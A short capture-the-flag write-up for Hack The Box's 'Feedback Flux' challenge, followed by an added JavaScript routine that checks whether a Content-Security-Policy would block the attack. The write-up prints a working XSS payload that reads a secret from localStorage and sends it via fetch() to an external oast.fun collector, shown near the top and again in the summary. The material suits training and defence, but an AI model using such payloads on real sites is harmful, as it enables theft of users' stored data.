HackTheBox Feedback Flux Writeup

Explore the basics of cybersecurity in the Feedback Flux Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

Use a webhook like https://app.interactsh.com/#/

Get your URL.

Just read ./challenge/app/Jobs/AdminBot.php

<?xml ><img src=x onerror="fetch('https://ozyttdpkujcaljzpqpymyaliclaef8wya.oast.fun?x=' + localStorage.getItem('flag'));"> ?>

Summary

Feedback Flux is an easy-level challenge on Hack The Box that exploits a combination of Cross-Site Scripting (XSS) and server-side file reading. A webhook URL is used to capture sensitive data. The XSS payload, <img src=x onerror="fetch('<webhook_url>?x=' + localStorage.getItem('flag'));">, extracts the flag stored in localStorage. Reading ./challenge/app/Jobs/AdminBot.php provides insights into the application’s behavior, showcasing the importance of securing both client-side and server-side components.
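A defender's view of the payload above, as an added example that is not part of the original writeup or the challenge's code: it checks whether a Content-Security-Policy header would stop the inline `onerror` handler and the `fetch()` to an external collector. The policies, origins and function names are constructed, and source matching is simplified (ports, paths and 'strict-dynamic' are ignored).

```javascript
// Added example: simplified CSP check (ports, paths and 'strict-dynamic' are ignored).
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...values] = part.trim().toLowerCase().split(/\s+/);
    // Per the CSP spec, the first occurrence of a directive wins.
    if (name && !policy.has(name)) policy.set(name, values);
  }
  return policy;
}

// Return the source list of the first directive in the fallback chain, or null.
function effective(policy, chain) {
  for (const name of chain) if (policy.has(name)) return policy.get(name);
  return null;
}

// Inline handlers such as onerror="..." run only if 'unsafe-inline' is in effect.
function inlineHandlerBlocked(policy) {
  const src = effective(policy, ['script-src-attr', 'script-src', 'default-src']);
  if (src === null) return false; // no script restriction at all
  // Browsers ignore 'unsafe-inline' when a nonce or hash source is present.
  const hasNonceOrHash = src.some(s => /^'(nonce|sha(256|384|512))-/.test(s));
  return hasNonceOrHash || !src.includes("'unsafe-inline'");
}

// fetch() destinations are governed by connect-src, falling back to default-src.
function fetchBlocked(policy, targetUrl, pageOrigin) {
  const src = effective(policy, ['connect-src', 'default-src']);
  if (src === null) return false;
  const target = new URL(targetUrl);
  const allowed = src.some(expr => {
    if (expr === '*') return true;
    if (expr === "'self'") return target.origin === pageOrigin;
    if (expr.endsWith(':')) return target.protocol === expr; // scheme source, e.g. https:
    if (expr.startsWith("'")) return false; // 'none' and other keywords
    const host = expr.replace(/^[a-z]+:\/\//, '').replace(/[:/].*$/, '');
    return host.startsWith('*.') ? target.hostname.endsWith(host.slice(1))
                                 : target.hostname === host;
  });
  return !allowed;
}

// Constructed policies and a placeholder collector URL (assumptions, not from the challenge).
const PAGE = 'https://app.example';
const EXFIL = 'https://collector.example/?x=FLAG';
function assess(header) {
  const p = parseCsp(header);
  return { inlineHandlerBlocked: inlineHandlerBlocked(p),
           fetchBlocked: fetchBlocked(p, EXFIL, PAGE) };
}
const WEAK = "default-src 'self'; script-src 'self' 'unsafe-inline'; connect-src *";
const STRICT = "default-src 'self'; script-src 'self'; connect-src 'self'";
console.log('weak  ', assess(WEAK));
console.log('strict', assess(STRICT));
```

Either control alone breaks this payload; keeping the secret out of `localStorage` removes what the script reads in the first place.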

This post is licensed under CC BY 4.0 by the author.